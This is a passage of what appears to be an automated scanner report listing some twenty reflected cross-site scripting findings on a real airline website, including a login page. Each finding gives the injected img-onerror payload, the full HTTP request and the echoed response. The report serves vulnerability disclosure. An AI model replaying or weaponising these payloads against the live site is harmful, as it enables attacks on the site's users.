<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="2464e"><img src=a onerror=alert(1)>a096f60c964" value="1" />
...[SNIP]...

1.60. https://www.aa.com/i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e513a"><img%20src%3da%20onerror%3dalert(1)>210b0fbc24c was submitted in the anchorEvent parameter. This input was echoed as e513a"><img src=a onerror=alert(1)>210b0fbc24c in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp?anchorEvent=falsee513a"><img%20src%3da%20onerror%3dalert(1)>210b0fbc24c&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112320


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="falsee513a"><img src=a onerror=alert(1)>210b0fbc24c" />
...[SNIP]...

1.61. https://www.aa.com/i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891f7"><img%20src%3da%20onerror%3dalert(1)>e539f7e8646 was submitted in the from parameter. This input was echoed as 891f7"><img src=a onerror=alert(1)>e539f7e8646 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp?anchorEvent=false&from=Nav891f7"><img%20src%3da%20onerror%3dalert(1)>e539f7e8646 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112320


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav891f7"><img src=a onerror=alert(1)>e539f7e8646" />
...[SNIP]...

1.62. https://www.aa.com/i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb5e"><img%20src%3da%20onerror%3dalert(1)>7699bb26335 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fb5e"><img src=a onerror=alert(1)>7699bb26335 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp?6fb5e"><img%20src%3da%20onerror%3dalert(1)>7699bb26335=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112257


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="6fb5e"><img src=a onerror=alert(1)>7699bb26335" value="1" />
...[SNIP]...

1.63. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6310e"><img%20src%3da%20onerror%3dalert(1)>caa4a6e54a was submitted in the anchorEvent parameter. This input was echoed as 6310e"><img src=a onerror=alert(1)>caa4a6e54a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp?anchorEvent=false6310e"><img%20src%3da%20onerror%3dalert(1)>caa4a6e54a&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107012


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false6310e"><img src=a onerror=alert(1)>caa4a6e54a" />
...[SNIP]...

1.64. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a2a"><img%20src%3da%20onerror%3dalert(1)>89e1a7cf55f was submitted in the from parameter. This input was echoed as f0a2a"><img src=a onerror=alert(1)>89e1a7cf55f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp?anchorEvent=false&from=Navf0a2a"><img%20src%3da%20onerror%3dalert(1)>89e1a7cf55f HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107013


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navf0a2a"><img src=a onerror=alert(1)>89e1a7cf55f" />
...[SNIP]...

1.65. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ecb0"><img%20src%3da%20onerror%3dalert(1)>5bb9a88a26c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ecb0"><img src=a onerror=alert(1)>5bb9a88a26c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp?6ecb0"><img%20src%3da%20onerror%3dalert(1)>5bb9a88a26c=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106950


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="6ecb0"><img src=a onerror=alert(1)>5bb9a88a26c" value="1" />
...[SNIP]...

1.66. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWithPets.jsp [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/travelingWithPets.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ab3a"><img%20src%3da%20onerror%3dalert(1)>f365f3756c0 was submitted in the anchorEvent parameter. This input was echoed as 3ab3a"><img src=a onerror=alert(1)>f365f3756c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/travelingWithPets.jsp?anchorEvent=false3ab3a"><img%20src%3da%20onerror%3dalert(1)>f365f3756c0&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137867


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false3ab3a"><img src=a onerror=alert(1)>f365f3756c0" />
...[SNIP]...

1.67. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWithPets.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/travelingWithPets.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d6bb"><img%20src%3da%20onerror%3dalert(1)>5cc699bbb83 was submitted in the from parameter. This input was echoed as 7d6bb"><img src=a onerror=alert(1)>5cc699bbb83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/travelingWithPets.jsp?anchorEvent=false&from=Nav7d6bb"><img%20src%3da%20onerror%3dalert(1)>5cc699bbb83 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137858


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav7d6bb"><img src=a onerror=alert(1)>5cc699bbb83" />
...[SNIP]...

1.68. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWithPets.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/travelingWithPets.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e033b"><img%20src%3da%20onerror%3dalert(1)>71e7545c6a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e033b"><img src=a onerror=alert(1)>71e7545c6a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/specialAssistance/travelingWithPets.jsp?e033b"><img%20src%3da%20onerror%3dalert(1)>71e7545c6a9=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137804


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="e033b"><img src=a onerror=alert(1)>71e7545c6a9" value="1" />
...[SNIP]...

1.69. https://www.aa.com/i18n/travelInformation/tickets/main.jsp [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/tickets/main.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 178f5"><img%20src%3da%20onerror%3dalert(1)>727373ccdda was submitted in the anchorEvent parameter. This input was echoed as 178f5"><img src=a onerror=alert(1)>727373ccdda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/tickets/main.jsp?anchorEvent=false178f5"><img%20src%3da%20onerror%3dalert(1)>727373ccdda&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105845


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false178f5"><img src=a onerror=alert(1)>727373ccdda" />
...[SNIP]...

1.70. https://www.aa.com/i18n/travelInformation/tickets/main.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/tickets/main.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2976"><img%20src%3da%20onerror%3dalert(1)>d6faf963344 was submitted in the from parameter. This input was echoed as d2976"><img src=a onerror=alert(1)>d6faf963344 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/tickets/main.jsp?anchorEvent=false&from=Navd2976"><img%20src%3da%20onerror%3dalert(1)>d6faf963344 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105827


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navd2976"><img src=a onerror=alert(1)>d6faf963344" />
...[SNIP]...

1.71. https://www.aa.com/i18n/travelInformation/tickets/main.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/tickets/main.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8956d"><img%20src%3da%20onerror%3dalert(1)>c3fa8a5f17b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8956d"><img src=a onerror=alert(1)>c3fa8a5f17b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/travelInformation/tickets/main.jsp?8956d"><img%20src%3da%20onerror%3dalert(1)>c3fa8a5f17b=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105782


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="8956d"><img src=a onerror=alert(1)>c3fa8a5f17b" value="1" />
...[SNIP]...

1.72. https://www.aa.com/i18n/urls/rss.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/urls/rss.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f03e"><img%20src%3da%20onerror%3dalert(1)>ac1fc5cf381 was submitted in the from parameter. This input was echoed as 3f03e"><img src=a onerror=alert(1)>ac1fc5cf381 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/urls/rss.jsp?from=Nav3f03e"><img%20src%3da%20onerror%3dalert(1)>ac1fc5cf381 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118814


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav3f03e"><img src=a onerror=alert(1)>ac1fc5cf381" />
...[SNIP]...

1.73. https://www.aa.com/i18n/urls/rss.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/urls/rss.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66b13"><img%20src%3da%20onerror%3dalert(1)>c23a7540257 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66b13"><img src=a onerror=alert(1)>c23a7540257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/urls/rss.jsp?66b13"><img%20src%3da%20onerror%3dalert(1)>c23a7540257=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118799


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="66b13"><img src=a onerror=alert(1)>c23a7540257" value="1" />
...[SNIP]...

1.74. https://www.aa.com/i18n/urls/westernunion.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/urls/westernunion.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec440"><img%20src%3da%20onerror%3dalert(1)>c52ff2e49cd was submitted in the from parameter. This input was echoed as ec440"><img src=a onerror=alert(1)>c52ff2e49cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/urls/westernunion.jsp?from=Navec440"><img%20src%3da%20onerror%3dalert(1)>c52ff2e49cd HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 111691


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navec440"><img src=a onerror=alert(1)>c52ff2e49cd" />
...[SNIP]...

1.75. https://www.aa.com/i18n/urls/westernunion.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/urls/westernunion.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a83c"><img%20src%3da%20onerror%3dalert(1)>3c34ed2c5f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a83c"><img src=a onerror=alert(1)>3c34ed2c5f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/urls/westernunion.jsp?6a83c"><img%20src%3da%20onerror%3dalert(1)>3c34ed2c5f0=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 111679


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="6a83c"><img src=a onerror=alert(1)>3c34ed2c5f0" value="1" />
...[SNIP]...

1.76. https://www.aa.com/i18n/utility/evoucher.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/utility/evoucher.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ca3a"><img%20src%3da%20onerror%3dalert(1)>85d02569aea was submitted in the from parameter. This input was echoed as 1ca3a"><img src=a onerror=alert(1)>85d02569aea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/utility/evoucher.jsp?from=Nav1ca3a"><img%20src%3da%20onerror%3dalert(1)>85d02569aea HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 111729


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav1ca3a"><img src=a onerror=alert(1)>85d02569aea" />
...[SNIP]...

1.77. https://www.aa.com/i18n/utility/evoucher.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/utility/evoucher.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e404"><img%20src%3da%20onerror%3dalert(1)>c082e077c79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e404"><img src=a onerror=alert(1)>c082e077c79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/utility/evoucher.jsp?4e404"><img%20src%3da%20onerror%3dalert(1)>c082e077c79=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 111708


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="4e404"><img src=a onerror=alert(1)>c082e077c79" value="1" />
...[SNIP]...

1.78. https://www.aa.com/i18n/utility/siteMap/siteMap.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/utility/siteMap/siteMap.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9febd"><img%20src%3da%20onerror%3dalert(1)>e2ab85aeddb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9febd"><img src=a onerror=alert(1)>e2ab85aeddb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/utility/siteMap/siteMap.jsp?9febd"><img%20src%3da%20onerror%3dalert(1)>e2ab85aeddb=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149584


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="9febd"><img src=a onerror=alert(1)>e2ab85aeddb" value="1" />
...[SNIP]...

1.79. https://www.aa.com/login/loginAccess.do [bookingPathStateId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /login/loginAccess.do

Issue detail

The value of the bookingPathStateId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8713c"><img%20src%3da%20onerror%3dalert(1)>1300f2d82ce was submitted in the bookingPathStateId parameter. This input was echoed as 8713c"><img src=a onerror=alert(1)>1300f2d82ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login/loginAccess.do?uri=%2flogin%2floginAccess.do&previousPage=%2fhomePage.do&bookingPathStateId=8713c"><img%20src%3da%20onerror%3dalert(1)>1300f2d82ce&marketId= HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Sun, 13 Nov 2011 13:43:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000inrgXRN8pQ5zS31eJVmnqY8:15mbfaj65; Path=/
Set-Cookie: JSESSIONID=0000X4NAhgwKfefzXy4imvwGu5h:15mbfaj65; Path=/
Content-Length: 102381


<HTML>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
